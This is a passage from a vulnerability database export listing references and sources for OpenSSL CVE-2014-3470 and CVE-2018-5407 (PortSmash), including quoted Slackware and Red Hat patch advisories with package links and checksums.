1.7, "url": "http://secunia.com/advisories/58716" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58714" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58667" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58615" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29195" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:106" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:105" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.7, "url": "http://secunia.com/advisories/61254" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59525" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59518" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59483" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59460" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59449" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59445" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59441" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59440" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59431" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-234763.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=8011cd56e39a433b1837465259a9bd24a38727fb" }, { "trust": 1.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93868849/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3470" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.6, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=8011cd56e39a433b1837465259a9bd24a38727fb" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03g" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_3470_denial_of" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false" }, { "trust": 0.3, "url": "http://www.cerberusftp.com/products/releasenotes.html" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/06/chrome-for-android-update.html" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678123" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678073" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www8.hp.com/us/en/software-solutions/operations-analytics-operations-analysis/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685551" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096059" }, { "trust": 0.3, "url": "http://www.marshut.com/ixwnpv/stunnel-5-02-released.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180978" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03d" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04363613" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368523" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21681494" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678413" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678660" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/33a01-5228bdf5d027e/cert_security_mini-_bulletin_xrx15ao_for_cq8570-cq8870_v1-0.pdf" }, { "trust": 0.3, "url": "http://www.checkpoint.com/defense/advisories/public/2014/cpai-10-jun3.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181079" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676276" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682026" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690128" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03b" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03f" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-2232-4/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.3, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.3, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-511c3e0b2f6f4f6bbc796fc619" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-3a7aa5e233904ebe847a5e1555" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-d775367b0a28449ca05660778b" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-c0d32bac154a4d93839d8cd1f2" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-8aefeaf490284a7691eca97d13" }, { "trust": 0.2, "url": "http://www.ubuntu.com/usn/usn-2232-1" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/476.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2014-3470" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34549" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3470" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2232-3/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-2c54f23c6dbc4d598e86fdef95" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-4480df0f6d544779b0143f5c3b" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4618" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2520" }, { "trust": 0.1, "url": "https://support.emc.com/downloads/2732_documentum-server" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2521" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-f6c141a7feeb4a358bbb28300f" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.3" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.15" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1329297" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.5" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8208c3987b1b4a5093f3e8fcc3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.18" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.14" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "BID", "id": "67898" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127080" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-081" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "BID", "id": "67898" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127080" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-081" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-05T00:00:00", "db": "VULMON", "id": "CVE-2014-3470" }, { "date": "2014-06-05T00:00:00", "db": "BID", "id": "67898" }, { "date": "2014-06-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "date": "2014-07-06T18:53:39", "db": "PACKETSTORM", "id": "127362" }, { "date": "2014-06-25T21:32:38", "db": "PACKETSTORM", "id": "127213" }, { "date": "2014-06-27T18:43:56", "db": "PACKETSTORM", "id": "127266" }, { "date": "2014-08-19T16:52:04", "db": "PACKETSTORM", "id": "127923" }, { "date": "2014-06-06T23:46:36", "db": "PACKETSTORM", "id": "126976" }, { "date": "2014-08-08T21:53:16", "db": "PACKETSTORM", "id": "127807" }, { "date": "2014-06-13T00:11:12", "db": "PACKETSTORM", "id": "127080" }, { "date": "2014-06-10T17:33:47", "db": "PACKETSTORM", "id": "127016" }, { "date": "2014-06-27T18:43:23", "db": "PACKETSTORM", "id": "127265" }, { "date": "2014-06-05T15:14:53", "db": "PACKETSTORM", "id": "126925" }, { "date": "2014-06-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-081" }, { "date": "2014-06-05T21:55:07.880000", "db": "NVD", "id": "CVE-2014-3470" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2014-3470" }, { "date": "2018-10-11T12:00:00", "db": "BID", "id": "67898" }, { "date": "2015-12-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "date": "2022-08-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-081" }, { "date": "2023-11-07T02:20:08.380000", "db": "NVD", "id": "CVE-2014-3470" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-081" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of s3_clnt.c of ssl3_send_client_key_exchange Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002767" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201406-081" } ], "trust": 0.6 } }
var-201811-0912
Vulnerability from variot
Simultaneous Multi-threading (SMT) in processors can enable local users to exploit software vulnerable to timing attacks via a side-channel timing attack on 'port contention'. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. An information disclosure vulnerability exists in OpenSSL. This vulnerability stems from configuration errors in network systems or products during operation. An unauthorized attacker could exploit the vulnerability to obtain sensitive information of the affected components.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz: Upgraded. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734 ( Security fix ) patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2q-x86_64-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.1.1a-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.1.1a-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.1.1a-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.1.1a-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: e6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz c61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz b7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz b5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: fc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz e873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Slackware 14.2 packages: d5f0cc19451e9c7e3967820cf02a20c6 openssl-1.0.2q-i586-1_slack14.2.txz 594ca80447baecd608a51083b12a26d9 openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages: 943bb2f3259ccf97a1b8b25f5f511c30 openssl-1.0.2q-x86_64-1_slack14.2.txz 0d45afe2487c47b283c06902c56e4559 openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Slackware -current packages: 6f01f6dd0f40a12e473320386cfc8536 a/openssl-solibs-1.1.1a-i586-1.txz 6e5a2ab2475a0d851376d12911b3c6b7 n/openssl-1.1.1a-i586-1.txz
Slackware x86_64 -current packages: eb4697703f1f4b81ad38e9247ab70dac a/openssl-solibs-1.1.1a-x86_64-1.txz 12a10fd6bd2344b3e73106c8d5b9828c n/openssl-1.1.1a-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.2q-i586-1_slack14.2.txz openssl-solibs-1.0.2q-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html
- Description:
This release adds the new Apache HTTP Server 2.4.37 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.29 and includes bug fixes and enhancements.
Security Fix(es):
- openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys (CVE-2018-0737) * openssl: timing side channel attack in the DSA signature algorithm (CVE-2018-0734) * mod_auth_digest: access control bypass due to race condition (CVE-2019-0217) * openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407) * mod_session_cookie does not respect expiry time (CVE-2018-17199) * mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189) * mod_http2: possible crash on late upgrade (CVE-2019-0197) * mod_http2: read-after-free on a string compare (CVE-2019-0196) * nghttp2: HTTP/2: large amount of data request leads to denial of service (CVE-2019-9511) * nghttp2: HTTP/2: flood using PRIORITY frames resulting in excessive resource consumption (CVE-2019-9513) * mod_http2: HTTP/2: 0-length headers leads to denial of service (CVE-2019-9516) * mod_http2: HTTP/2: request for large response leads to denial of service (CVE-2019-9517)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys 1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm 1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) 1668493 - CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time 1668497 - CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies 1695020 - CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition 1695030 - CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare 1695042 - CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade 1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption 1741860 - CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service 1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service 1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security and bug fix update Advisory ID: RHSA-2019:0483-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:0483 Issue date: 2019-03-12 CVE Names: CVE-2018-5407 ==================================================================== 1. Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
- openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Perform the RSA signature self-tests with SHA-256 (BZ#1673914)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
